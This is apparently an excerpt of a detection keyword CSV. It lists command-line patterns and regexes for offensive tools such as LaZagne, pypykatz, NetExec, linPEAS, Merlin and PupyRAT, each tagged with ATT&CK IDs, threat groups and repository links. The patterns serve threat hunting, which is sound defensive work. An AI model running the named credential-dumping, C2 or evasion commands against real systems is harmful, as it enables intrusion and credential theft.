"* Ladon.ps1*",".{0,1000}\sLadon\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1920"
"* Ladon.py*",".{0,1000}\sLadon\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1921"
"* Lalin.sh*",".{0,1000}\sLalin\.sh.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/LALIN","1","0","N/A","N/A","N/A","4","366","150","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z","1922"
"* lambdaenum.py*",".{0,1000}\slambdaenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","1923"
"* laps.py *--ldapserver*",".{0,1000}\slaps\.py\s.{0,1000}\-\-ldapserver.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","1924"
"* laps.py *-u * -p *",".{0,1000}\slaps\.py\s.{0,1000}\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","1925"
"* LAPSToolkit.ps1*",".{0,1000}\sLAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","LAPSToolkit","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","LAPSToolkit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1926"
"* LAPSToolkit.ps1*",".{0,1000}\sLAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","LAPSToolkit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1927"
"* LatLoader.py*",".{0,1000}\sLatLoader\.py.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","N/A","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","1928"
"* LaZagne.py *",".{0,1000}\sLaZagne\.py\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","1929"
"* laZagne.py*",".{0,1000}\slaZagne\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","1930"
"* lazypariah*",".{0,1000}\slazypariah.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Resource Development","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","N/A","2","140","28","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z","1931"
"* ldap * --gmsa *dump*",".{0,1000}\sldap\s.{0,1000}\s\-\-gmsa\s.{0,1000}dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","1932"
"* ldap * --trusted-for-delegation*",".{0,1000}\sldap\s.{0,1000}\s\-\-trusted\-for\-delegation.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1933"
"* ldap * -u * -p * --admin-count*",".{0,1000}\sldap\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-admin\-count.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1934"
"* ldap * -u * -p * -M whoami *",".{0,1000}\sldap\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\swhoami\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1935"
"* --ldap servicePrincipalName=* --domain * --user * --pass *",".{0,1000}\s\-\-ldap\sservicePrincipalName\=.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","1936"
"* ldap-brute.nse*",".{0,1000}\sldap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1937"
"* ldap-novell-getpass.nse*",".{0,1000}\sldap\-novell\-getpass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1938"
"* ldapper.py*",".{0,1000}\sldapper\.py.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","1939"
"* ldapph.db*",".{0,1000}\sldapph\.db.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","1940"
"* ldap-rootdse.nse*",".{0,1000}\sldap\-rootdse\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1941"
"* ldap-search.nse*",".{0,1000}\sldap\-search\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1942"
"* ldapsearch-ad.py*",".{0,1000}\sldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","1943"
"* --ldapusername  * --ldappassword *",".{0,1000}\s\-\-ldapusername\s\s.{0,1000}\s\-\-ldappassword\s.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","1944"
"* ldeep_dump *",".{0,1000}\sldeep_dump\s.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","1945"
"* letmein.ps1*",".{0,1000}\sletmein\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1946"
"* lexmark-config.nse*",".{0,1000}\slexmark\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1947"
"* lfs_injection.exe*",".{0,1000}\slfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1948"
"* libprocesshider.so *",".{0,1000}\slibprocesshider\.so\s.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","1949"
"* libpwn.c*",".{0,1000}\slibpwn\.c.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","1950"
"* libpwn.so*",".{0,1000}\slibpwn\.so.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","1951"
"* link smb * merlinPipe*",".{0,1000}\slink\ssmb\s.{0,1000}\smerlinPipe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","1952"
"* linpeas.sh *",".{0,1000}\slinpeas\.sh\s.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","#linux","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","1953"
"* linpeas.sh*",".{0,1000}\slinpeas\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1954"
"* -linpeas=http://*",".{0,1000}\s\-linpeas\=http\:\/\/.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","1955"
"* -linpeas=http://127.0.0.1/linpeas.sh*",".{0,1000}\s\-linpeas\=http\:\/\/127\.0\.0\.1\/linpeas\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","1956"
"* linux_stealth.py*",".{0,1000}\slinux_stealth\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#linux","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","1957"
"* linWinPwn*",".{0,1000}\slinWinPwn.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","1958"
"* --list=hidden-options*",".{0,1000}\s\-\-list\=hidden\-options.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1959"
"* -listen :* -socks * -cert * -agentpassword *",".{0,1000}\s\-listen\s\:.{0,1000}\s\-socks\s.{0,1000}\s\-cert\s.{0,1000}\s\-agentpassword\s.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY BEAR","C2","https://github.com/llkat/rsockstun","1","0","N/A","N/A","10","10","53","22","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z","1960"
"* -ListMetasploitPayloads*",".{0,1000}\s\-ListMetasploitPayloads.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","1961"
"* --list-payloads*",".{0,1000}\s\-\-list\-payloads.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","1962"
"* live dpapi blobfile *.blob*",".{0,1000}\slive\sdpapi\sblobfile\s.{0,1000}\.blob.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1964"
"* live dpapi cred *",".{0,1000}\slive\sdpapi\scred\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1965"
"* live dpapi keys -o *",".{0,1000}\slive\sdpapi\skeys\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1966"
"* live dpapi securestring *",".{0,1000}\slive\sdpapi\ssecurestring\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1967"
"* live dpapi vcred *",".{0,1000}\slive\sdpapi\svcred\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1968"
"* live dpapi vpol *",".{0,1000}\slive\sdpapi\svpol\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1969"
"* live dpapi wifi*",".{0,1000}\slive\sdpapi\swifi.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1970"
"* live kerberos apreq *",".{0,1000}\slive\skerberos\sapreq\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1971"
"* live kerberos dump*",".{0,1000}\slive\skerberos\sdump.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1972"
"* live kerberos purge*",".{0,1000}\slive\skerberos\spurge.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1973"
"* live kerberos roast*",".{0,1000}\slive\skerberos\sroast.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1974"
